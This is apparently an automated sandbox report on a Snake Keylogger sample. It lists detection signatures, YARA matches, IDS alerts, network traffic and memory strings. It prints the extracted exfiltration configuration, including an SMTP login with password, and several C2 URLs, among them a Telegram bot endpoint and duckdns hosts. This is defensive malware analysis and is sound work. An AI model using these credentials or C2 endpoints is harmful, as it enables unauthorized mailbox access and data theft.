
Windows Analysis Report
XFo9jVGyLQ.exe

Overview

General Information

Sample name: XFo9jVGyLQ.exe (renamed because the original name is a hash value)
Original sample name: 44a234e2ebc159b044afa154f48b85f0a9634751638a7ca1f1a6817c5e3ffee1.exe
Analysis ID: 1632400
MD5: 414a4cce996061c8f67088e96b9e5745
SHA1: c6ed06b06aa148537fcc1ec9fcbb5f080519cea5
SHA256: 44a234e2ebc159b044afa154f48b85f0a9634751638a7ca1f1a6817c5e3ffee1
Tags: exe, SnakeKeylogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • XFo9jVGyLQ.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\XFo9jVGyLQ.exe" MD5: 414A4CCE996061C8F67088E96B9E5745)
    • XFo9jVGyLQ.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\XFo9jVGyLQ.exe" MD5: 414A4CCE996061C8F67088E96B9E5745)
  • cleanup
Malware family reference (Malpedia):
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Extracted malware configuration:
VIP Keylogger: {"Exfil Mode": "SMTP", "Email ID": "reyes@residenciaviladoconde.com", "Password": "596100Aa++++", "Host": "smtp.ionos.es", "Port": "587"}
Snake Keylogger: {"Exfil Mode": "SMTP", "Username": "reyes@residenciaviladoconde.com", "Password": "596100Aa++++", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Yara matches on memory dumps (Source, then Rule | Description | Author):

00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp
  • JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  • JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
  • JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
  • Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    Matched strings:
    0x2d871: $a1: get_encryptedPassword
    0x2db9a: $a2: get_encryptedUsername
    0x2d681: $a3: get_timePasswordChanged
    0x2d78a: $a4: get_passwordField
    0x2d887: $a5: set_encryptedPassword
    0x2ef5a: $a7: get_logins
    0x2eebd: $a10: KeyLoggerEventArgs
    0x2eb22: $a11: KeyLoggerEventArgsEventHandler
(13 matching entries in total; only the rows above are included in this extract)

Yara matches on unpacked PE files (Source, then Rule | Description | Author):

0.2.XFo9jVGyLQ.exe.4d36288.2.unpack
  • JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  • JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
  • JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
  • Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    Matched strings:
    0x2bc71: $a1: get_encryptedPassword
    0x2bf9a: $a2: get_encryptedUsername
    0x2ba81: $a3: get_timePasswordChanged
    0x2bb8a: $a4: get_passwordField
    0x2bc87: $a5: set_encryptedPassword
    0x2d35a: $a7: get_logins
    0x2d2bd: $a10: KeyLoggerEventArgs
    0x2cf22: $a11: KeyLoggerEventArgsEventHandler
  • MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
    Matched strings:
    0x39a78: $a2: \Comodo\Dragon\User Data\Default\Login Data
    0x3911b: $a3: \Google\Chrome\User Data\Default\Login Data
    0x39378: $a4: \Orbitum\User Data\Default\Login Data
    0x39d57: $a5: \Kometa\User Data\Default\Login Data
(23 matching entries in total; only the rows above are included in this extract)
                No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP:Port -> Destination IP:Port | Protocol):

2025-03-07T23:22:20.018057+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9:49685 -> 104.21.96.1:443 | TCP
2025-03-07T23:22:23.366202+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9:49687 -> 104.21.96.1:443 | TCP
2025-03-07T23:22:35.729444+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9:49695 -> 104.21.96.1:443 | TCP
2025-03-07T23:22:14.902436+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9:49683 -> 132.226.247.73:80 | TCP
2025-03-07T23:22:17.668241+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9:49683 -> 132.226.247.73:80 | TCP
2025-03-07T23:22:20.793056+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9:49686 -> 132.226.247.73:80 | TCP
2025-03-07T23:22:24.152430+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9:49688 -> 132.226.247.73:80 | TCP
2025-03-07T23:22:44.328853+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.9:49700 -> 149.154.167.220:443 | TCP


                AV Detection

Source: XFo9jVGyLQ.exe | Avira: detected
Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "reyes@residenciaviladoconde.com", "Password": "596100Aa++++", "Host": "smtp.ionos.es", "Port": "587"}
Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reyes@residenciaviladoconde.com", "Password": "596100Aa++++", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: XFo9jVGyLQ.exe | VirusTotal: Detection: 75%
Source: XFo9jVGyLQ.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack | String decryptor: reyes@residenciaviladoconde.com
Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack | String decryptor: 596100Aa++++
Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack | String decryptor: smtp.ionos.es
Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack | String decryptor: anyaegbu.kay@gmail.com
Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack | String decryptor: 587
Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack | String decryptor: (empty string)

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: XFo9jVGyLQ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49684 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49700 version: TLS 1.2
Source: XFo9jVGyLQ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: APWe.pdb | source: XFo9jVGyLQ.exe
Source: Binary string: APWe.pdbSHA2564 | source: XFo9jVGyLQ.exe
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 4x nop then <instruction> | <function>:
  jmp 010CF45Dh | 1_2_010CF2C0
  jmp 010CF45Dh | 1_2_010CF4AC
  jmp 010CFC19h | 1_2_010CF961
  jmp 06733308h | 1_2_06732EF0
  jmp 06732D41h | 1_2_06732A90
  mov dword ptr [ebp-14h], 00000000h | 1_2_06730673
  jmp 0673D919h | 1_2_0673D670
  jmp 06733308h | 1_2_06732EEB
  jmp 0673E1C9h | 1_2_0673DF20
  jmp 0673EA79h | 1_2_0673E7D0
  jmp 0673EED1h | 1_2_0673EC28
  jmp 0673F781h | 1_2_0673F4D8
  jmp 0673D069h | 1_2_0673CDC0
  jmp 06733308h | 1_2_06733236
  jmp 0673D4C1h | 1_2_0673D218
  jmp 0673DD71h | 1_2_0673DAC8
  jmp 0673E621h | 1_2_0673E378
  jmp 06730D0Dh | 1_2_06730B30
  jmp 067316F8h | 1_2_06730B30
  mov dword ptr [ebp-14h], 00000000h | 1_2_06730853
  mov dword ptr [ebp-14h], 00000000h | 1_2_06730040
  jmp 0673F329h | 1_2_0673F080
  jmp 0673FBD9h | 1_2_0673F930

                Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49700 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected (9 identical requests observed, 6 of them with "Connection: Keep-Alive"; no User-Agent header is sent):
  GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected:
  GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:29:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
  Host: api.telegram.org
  Connection: Keep-Alive
  Note: both the bot token (the path segment between /bot and /sendMessage) and the chat_id parameter are empty in this request, so it carries no usable Telegram credential. The percent-decoded text parameter is:
    PC Name:887849
    Date and Time: 09/03/2025 / 00:29:05
    Country Name: United States
    [ 887849 Clicked on the File If you see nothing this's mean the system storage's empty. ]
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.96.1 (listed twice)
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49686 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49688 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49683 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49685 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49687 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49695 -> 104.21.96.1:443
Source: global traffic | HTTP traffic detected (10 identical requests observed, 6 of them with "Connection: Keep-Alive"):
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49684 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected (response; its Date header matches the Telegram Send Message alert at 23:22:44+0100):
  HTTP/1.1 404 Not Found
  Server: nginx/1.18.0
  Date: Fri, 07 Mar 2025 22:22:44 GMT
  Content-Type: application/json
  Content-Length: 55
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Strings found in binary or memory. Memory dumps are abbreviated by their base address; the full identifiers are:
  [file]     XFo9jVGyLQ.exe (the sample on disk)
  [049F2000] 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp
  [00402000] 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  [02AA1000] 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp
  [02AEE000] 00000001.00000002.3336827072.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp
  [02B18000] 00000001.00000002.3336827072.0000000002B18000.00000004.00000800.00020000.00000000.sdmp
  [02B5E000] 00000001.00000002.3336827072.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp
  [02B85000] 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp
  [02C22000] 00000001.00000002.3336827072.0000000002C22000.00000004.00000800.00020000.00000000.sdmp
  [02C2C000] 00000001.00000002.3336827072.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp
  [02C31000] 00000001.00000002.3336827072.0000000002C31000.00000004.00000800.00020000.00000000.sdmp
  [02C53000] 00000001.00000002.3336827072.0000000002C53000.00000004.00000800.00020000.00000000.sdmp
  [02C5D000] 00000001.00000002.3336827072.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp
  [02C62000] 00000001.00000002.3336827072.0000000002C62000.00000004.00000800.00020000.00000000.sdmp
  [03B61000] 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp
  [03DB6000] 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp

  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded  [049F2000] [00402000]
  http://aborters.duckdns.org:8081  [049F2000] [02AA1000] [00402000]
  http://anotherarmy.dns.army:8081  [049F2000] [02AA1000] [00402000]
  http://checkip.dyndns.org  [02AA1000]
  http://checkip.dyndns.org/  [02AA1000]
  http://checkip.dyndns.org/q  [049F2000] [00402000]
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name  [02AA1000]
  http://tempuri.org/DataSet1.xsd  [file]
  http://varders.kozow.com:8081  [049F2000] [02AA1000] [00402000]
  https://ac.ecosia.org?q=  [03B61000]
  https://api.telegram.org  [02B85000]
  https://api.telegram.org/bot  [049F2000] [02B85000] [00402000]
  https://api.telegram.org/bot/sendMessage?chat_id=&text=  [02B85000]
  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20a  [02B85000] (truncated in the report)
  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=  [03B61000]
  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search  [03DB6000] [03B61000]
  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=  [03DB6000] [03B61000]
  https://chrome.google.com/webstore?hl=en  [02C31000] [02C22000]
  https://chrome.google.com/webstore?hl=en4  [02C31000]
  https://chrome.google.com/webstore?hl=enlBNr  [02C2C000]
  https://duckduckgo.com/ac/?q=  [03B61000]
  https://duckduckgo.com/chrome_newtabv20  [03DB6000] [03B61000]
  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=  [03B61000]
  https://gemini.google.com/app?q=  [03B61000]
  https://reallyfreegeoip.org  [02AEE000] [02B85000] [02B5E000]
  https://reallyfreegeoip.org/xml/  [049F2000] [02AEE000] [00402000]
  https://reallyfreegeoip.org/xml/8.46.123.189  [02B5E000]
  https://reallyfreegeoip.org/xml/8.46.123.189$  [02B85000] [02B18000] [02B5E000]
  https://www.ecosia.org/newtab/v20Y&  [03DB6000] [03B61000]
  https://www.google.com/images/branding/product/ico/googleg_alldp.ico  [03DB6000] [03B61000]
  https://www.office.com/  [02C62000] [02C53000]
  https://www.office.com/4  [02C62000]
  https://www.office.com/lBNr  [02C5D000]
Source: unknown | Network traffic detected: HTTP traffic on port 443, in both directions, with local ports 49684, 49685, 49687, 49689, 49691, 49693, 49695, 49697, 49699, 49700
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49700 version: TLS 1.2

                System Summary

                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_056B6F90
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_056BD3E4
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766E6F8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766CD80
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07666D98
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07667CB8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07665B88
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07669F70
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07669F80
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766A540
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07668D00
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07668D10
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766D4C0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07664C99
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07665B77
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766A370
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07669B50
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766EBD0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07667BB7
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766A380
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07666399
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766D268
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766D018
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766E018
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766A0E1
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0766A0F0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07876418
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07875FE0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07877F49
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07877F58
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07875BA8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07877B1D
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07877B20
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010C7118
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CC146
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CA088
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010C5370
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CD278
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CC468
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CC738
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CE988
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010C69A0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CCA08
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CCCD8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CCFAB
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CF961
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010CE97B
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010C29EC
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010C3AB1
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_010C3E09
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06739668
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06731FA8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06739D90
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06732A90
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06731850
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06735148
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673D670
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673D660
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673DF20
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673DF11
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673E7D0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673E7C0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673E7CF
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06731F98
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06739448
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06739C3E
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673EC28
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673EC18
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673F4D8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06738CC0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673F4C8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06738CB1
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673CDC0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673CDAF
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673D218
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673DAC8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673DAB9
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06732A80
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673E378
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673E36B
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06730B30
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06730B20
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673F071
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06731841
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06730040
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06730007
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673F080
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673F930
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_06735138
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673F923
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000002.874252399.00000000014BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs XFo9jVGyLQ.exe
